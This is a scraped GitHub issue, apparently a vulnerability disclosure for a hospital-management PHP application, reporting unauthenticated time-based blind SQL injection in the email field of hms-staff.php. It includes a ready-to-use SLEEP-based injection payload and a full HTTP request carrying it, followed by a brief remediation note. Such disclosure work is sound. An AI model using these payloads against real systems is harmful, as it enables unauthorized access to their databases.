Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.
By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.
Already on GitHub? Sign in to your account
KhanhCM (@khanhchauminh)
username
password
Admin
email
Example payload:
' AND (SELECT 1 FROM (SELECT(SLEEP(5)))a) AND 'a'='a
POST /hms-staff.php HTTP/1.1 Host: 127.0.0.1:8888 Content-Length: 120 Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 Origin: http://127.0.0.1:8888 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.83 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Referer: http://127.0.0.1:8888/hms-staff.php Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Cookie: PHPSESSID=ghpdj0nh826f31malqm7j3dko7 Connection: close email=admin@example.com'%20AND%20(SELECT%201%20FROM%20(SELECT(SLEEP(5)))a)%20AND%20'a'%3d'a&password=password&type=admin
Validate input of email parameter in hms-staff.php.
hms-staff.php
The text was updated successfully, but these errors were encountered:
No branches or pull requests
Author
KhanhCM (@khanhchauminh)
Version: 1.0
No login is required
Steps to reproduce
username,passwordand chooseAdminin the User Typeemailparameter.Example payload:
Proof-of-concept
Response in Burpsuite
Source code review
hms-staff.php
library.php
Remediation
Validate input of
emailparameter inhms-staff.php.The text was updated successfully, but these errors were encountered: